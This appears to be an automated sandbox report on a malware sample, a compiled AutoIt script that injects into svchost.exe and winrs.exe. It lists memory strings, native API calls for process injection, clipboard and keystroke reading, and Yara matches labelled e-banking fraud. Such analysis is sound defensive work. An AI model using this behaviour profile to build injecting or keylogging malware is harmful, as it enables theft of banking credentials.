                Source: winrs.exe, 00000003.00000003.1957309498.0000000007B42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EC6B0C
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00EC6D07
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EC6B0C
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00EB2B37
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EDF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00EDF7FF

                E-Banking Fraud

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3520669153.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1774901858.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1775305833.0000000004E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3519819683.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3520621345.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1774629160.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3520719360.0000000004150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00E73D19 This is a third-party compiled AutoIt script.
Source: KSts9xW7qy.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: KSts9xW7qy.exe, 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_fe094e75-8)
Source: KSts9xW7qy.exe, 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer (memstr_447aa17e-9)
Source: KSts9xW7qy.exe | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_4f86d4f8-5)
Source: KSts9xW7qy.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer (memstr_72f04099-4)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C403 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03674340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03674650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672C70 NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03673010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03673090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03673D70 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03673D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D4340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D4650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D39B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2FA0 NtQuerySection
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D2CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D3010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D3090 NtSetValueKey
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D3D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_033D3D70 NtOpenThread
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_029D8EE0 NtCreateFile
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_029D9340 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_029D9050 NtReadFile
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_029D91E0 NtClose
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_029D9140 NtDeleteFile
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_0326FBCD NtResumeThread
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_0326F969 NtMapViewOfSection
Source: C:\Windows\SysWOW64\winrs.exe | Code function: 3_2_0326F94E NtMapViewOfSection
Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EB6685 CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EAACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EB79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9B0430_2_00E9B043
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E832000_2_00E83200
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA410F0_2_00EA410F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E902A40_2_00E902A4
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E7E3B00_2_00E7E3B0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA038E0_2_00EA038E
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E906D90_2_00E906D9
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA467F0_2_00EA467F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EDAACE0_2_00EDAACE
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA4BEF0_2_00EA4BEF
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9CCC10_2_00E9CCC1
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E7AF500_2_00E7AF50
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E76F070_2_00E76F07
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9D1B90_2_00E9D1B9
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00ED31BC0_2_00ED31BC
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8B11F0_2_00E8B11F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA724D0_2_00EA724D
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9123A0_2_00E9123A
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E793F00_2_00E793F0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB13CA0_2_00EB13CA
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8F5630_2_00E8F563
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E796C00_2_00E796C0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBB6CC0_2_00EBB6CC
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EDF7FF0_2_00EDF7FF
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E777B00_2_00E777B0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA79C90_2_00EA79C9
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8FA570_2_00E8FA57
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E79B600_2_00E79B60
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E83B700_2_00E83B70
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E77D190_2_00E77D19
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E99ED00_2_00E99ED0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8FE6F0_2_00E8FE6F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E77FA30_2_00E77FA3
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_017CFA000_2_017CFA00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183B31_2_004183B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012501_2_00401250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EA031_2_0042EA03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004042CC1_2_004042CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023F91_2_004023F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004024001_2_00402400
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FC2A1_2_0040FC2A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FC331_2_0040FC33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165B01_2_004165B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165B31_2_004165B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FE531_2_0040FE53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DE331_2_0040DE33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF791_2_0040DF79
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF831_2_0040DF83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FB01_2_00402FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA3521_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F01_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037003E61_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E02741_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C02C01_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C81581_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036301001_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA1181_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F81CC1_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F41A21_2_036F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037001AA1_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D20001_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036407701_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036647501_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C01_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C6E01_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036405351_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037005911_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F24461_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E44201_2_036E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EE4F61_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB401_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F6BD71_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA801_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036569621_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A01_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370A9A61_2_0370A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364A8401_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036428401_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E8F01_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036268B81_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4F401_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03682F281_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660F301_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E2F301_2_036E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632FC81_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BEFA01_2_036BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640E591_2_03640E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEE261_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEEDB1_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652E901_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FCE931_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364AD001_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DCD1F1_2_036DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363ADE01_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03658DBF1_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640C001_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630CF21_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0CB51_2_036E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C1_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D1_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0368739A1_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D2F01_2_0365D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C01_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A01_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367516C1_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F1721_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B16B1_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364B1B01_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F70E91_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF0E01_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF0CC1_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C01_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF7B01_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036856301_2_03685630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F16CC1_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F75711_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037095C31_2_037095C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036FFB76
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03685AA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E1AA3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D5910
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03603FD2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03603FD5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036FFCF2
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_0443FC9E
